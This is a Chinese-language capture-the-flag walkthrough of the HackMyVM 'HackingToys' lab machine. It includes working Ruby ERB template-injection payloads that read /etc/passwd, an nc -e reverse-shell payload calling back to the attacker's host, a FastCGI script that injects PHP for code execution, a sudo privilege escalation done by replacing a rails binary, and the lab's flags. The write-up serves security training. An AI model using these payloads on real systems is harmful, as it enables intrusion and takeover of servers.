HackMyVM-HackingToys-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.143  08:00:27:ca:dc:49       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:ed:2f:2b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.065 seconds (123.97 hosts/sec). 4 responded
❯ export ip=192.168.60.143
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.143:22
Open 192.168.60.143:3000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-21 13:39 CST
Initiating ARP Ping Scan at 13:39
Scanning 192.168.60.143 [1 port]
Completed ARP Ping Scan at 13:39, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:39
Completed Parallel DNS resolution of 1 host. at 13:39, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:39
Scanning 192.168.60.143 [2 ports]
Discovered open port 22/tcp on 192.168.60.143
Discovered open port 3000/tcp on 192.168.60.143
Completed SYN Stealth Scan at 13:39, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.143
Host is up, received arp-response (0.00052s latency).
Scanned at 2025-04-21 13:39:09 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
3000/tcp open  ppp     syn-ack ttl 64
MAC Address: 08:00:27:CA:DC:49 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

存在3000端口开放

尝试访问一下

结果一直超时，浏览器也没法直接访问

利用rustscan带全参数扫描，发现是套了SSL证书的Https站点

PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLuHH80SwA8Qff3pGOY4aBesL0Aeesw6jqX+pbtR9O7w8jlbyNhuHmjjABb/34BxFp2oBx8o5xuZVXS1cE9nAlE=
|   256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICKFE9s2IvPGAJ7Pt0kSC8t9OXYUrueJQQplSC2wbYtY
3000/tcp open  ssl/ppp? syn-ack ttl 64
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=FR
| Issuer: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=FR
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-20T15:36:20
| Not valid after:  2038-01-27T15:36:20
| MD5:   6ac6:1f8b:e3f8:dce0:4b1a:d12b:1259:386d
| SHA-1: c423:6072:834f:77b9:396c:6907:8e29:08d6:f8c7:631d
……………………省略

SSTI

尝试访问一下，忽略证书安全，得到

随便点击会显示Hacking Gadgets(黑客小工具)的相关图片

下方有个搜索功能

当你随便输入后就会出现Product does not exist(产品不存在)

通过识别网页指纹，得知是由Ruby语言编写的

猜测存在SSTI服务器模板注入

参考以下文章SSTI（服务器端模板注入）- HackTricks

[PayloadsAllTheThings/Server Side Template Injection/Ruby.md at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/Ruby.md)

基本方法是先识别模板引擎，枚举可访问的类/方法，最后利用它们来获取所需的操作

依次尝试利用一下不同的payload，发现<%= 7 * 7 %>此条会报错

提示编码错误

在搜索后会两个参数query message，在message中传参%3C%25=7*7%25%3E就是上面的payload进行url编码后的结果

成功显示7*7的结果

读一下etc/passwd利用此payload

%3C%25=%20File.open('/etc/passwd').read%20%25%3E

从中得到lidia dodi用户

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
lidia:x:1000:1000:,,,:/home/lidia:/bin/bash
dodi:x:1001:1001:,,,:/home/dodi:/bin/bash

那就尝试执行命令，反弹shell过来

%3C%25=%20%60nc%20-e%20/bin/bash%20192.168.60.100%204444%60%20%25%3E

用户提权

监听端口

再次信息收集，得知存在本地端口开放80 9000

[+] Got reverse shell from hacktoys-192.168.60.150-Linux-x86_64 😍️ Assigned SessionID <3>
(Penelope)─(Session [1])> interact
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/hacktoys~192.168.60.150_Linux_x86_64/2025_04_22-21_40_29-419.log 📜
──────────────────────────────────────────────────────────────────────────
lidia@hacktoys:~$ ss -luntp
Netid       State        Recv-Q       Send-Q              Local Address:Port               Peer Address:Port       Process
udp         UNCONN       0            0                         0.0.0.0:68                      0.0.0.0:*
tcp         LISTEN       0            1024                      0.0.0.0:3000                    0.0.0.0:*           users:(("ruby",pid=1157,fd=7))
tcp         LISTEN       0            4096                    127.0.0.1:9000                    0.0.0.0:*
tcp         LISTEN       0            128                       0.0.0.0:22                      0.0.0.0:*
tcp         LISTEN       0            511                     127.0.0.1:80                      0.0.0.0:*
tcp         LISTEN       0            128                          [::]:22                         [::]:*

尝试将80端口转发出来

(Penelope)─(Session [1])> portfwd 0.0.0.0:8080<-127.0.0.1:80
[+] Setup Port Forwarding: 0.0.0.0:8080 <- 127.0.0.1:80
(Penelope)─(Session [1])> (Penelope)─(Session [1])>

浏览器尝试访问一下

然而并没有什么软用😅

还可以看到在/var/www/html下存在.git目录，仔细看了下日志信息，没有什么收获

FastCGI2Rce

不过还有一个9000端口

通过查看apache的配置文件得知

允许在/var/www/html目录下执行CGI脚本

lidia@hacktoys:/tmp$ cat /etc/apache2/sites-available/fastcgi.conf
<VirtualHost 127.0.0.1:80>
    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html

    <Directory /var/www/html>
        Options +ExecCGI
        AddHandler fcgid-script .fcgi
        FCGIWrapper /usr/lib/cgi-bin/php-cgi .php
        DirectoryIndex index.php index.html
        AllowOverride All
        Require all granted
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

具体利用可以参考9000 - 渗透测试 FastCGI - HackTricks

FastCGI Pentesting | Exploit Notes

可以看到显示出dodi的用户

lidia@hacktoys:/tmp$ cat a.sh
#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done
lidia@hacktoys:/tmp$ ./a.sh
Content-type: text/html; charset=UTF-8

<!--dodi
--><!DOCTYPE html>
<html lang="en">

<head>

修改payload，提权至dodi用户

lidia@hacktoys:/tmp$ ./a.sh
[+] Got reverse shell from hacktoys-192.168.60.150-Linux-x86_64 😍️ Assigned SessionID <4>
(Penelope)─(Session [1])> interact 4
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/hacktoys~192.168.60.150_Linux_x86_64/2025_04_22-22_38_13-459.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
dodi@hacktoys:/var/www/html$ cd ~
dodi@hacktoys:~$ cat user.txt
b075b24bdb11990e185c32c43539c39f
dodi@hacktoys:~$ sudo -l
Matching Defaults entries for dodi on hacktoys:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User dodi may run the following commands on hacktoys:
    (ALL : ALL) NOPASSWD: /usr/local/bin/rvm_rails.sh

Root提权

发现用户可以拥有sudo权限可以执行/usr/local/bin/rvm_rails.sh

先查看一下文件类型，是个shell脚本

查看内容

发现声明了一堆变量，最后执行rails应用

dodi@hacktoys:~$ file /usr/local/bin/rvm_rails.sh
/usr/local/bin/rvm_rails.sh: Bourne-Again shell script, ASCII text executable
dodi@hacktoys:~$ cat /usr/local/bin/rvm_rails.sh
#!/bin/bash
export rvm_prefix=/usr/local
export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0
export RUBY_VERSION=ruby-3.1.0
export rvm_version=1.29.12
export rvm_bin_path=/usr/local/rvm/bin
export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global
export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin
export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc
export rvm_path=/usr/local/rvm
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"

不过你可以发现/usr/local/rvm/gems/ruby-3.1.0/bin文件夹是属于rvm用户组的

而且通过查看/etc/group可以得知用户lidia也是属于此组

回到上一个shell中，直接修改文件即可

dodi@hacktoys:/tmp/toolkit-ZksbkVHZ$ cat /etc/group|grep rvm
rvm:x:1002:lidia,root
------------------------------------
[!] Session detached ⇲
(Penelope)─(Session [4])> interact 3
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [3], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/hacktoys~192.168.60.150_Linux_x86_64/2025_04_22-22_16_19-399.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
lidia@hacktoys:/opt/app/gadgets$ cd /usr/local/rvm/gems/ruby-3.1.0/bin
lidia@hacktoys:/usr/local/rvm/gems/ruby-3.1.0/bin$ rm rails
lidia@hacktoys:/usr/local/rvm/gems/ruby-3.1.0/bin$ echo 'bash -p'>rails
lidia@hacktoys:/usr/local/rvm/gems/ruby-3.1.0/bin$ chmod +x rails
------------------------------------
[!] Session detached ⇲
(Penelope)─(Session [3])> interact 4
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/hacktoys~192.168.60.150_Linux_x86_64/2025_04_22-22_38_13-459.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
dodi@hacktoys:/tmp/toolkit-ZksbkVHZ$ sudo /usr/local/bin/rvm_rails.sh
root@hacktoys:/tmp/toolkit-ZksbkVHZ# id
uid=0(root) gid=0(root) groups=0(root),1002(rvm)
root@hacktoys:/tmp/toolkit-ZksbkVHZ# cat /root/root.txt
64aa5a7aaf42af74ee6b59d5ac5c1509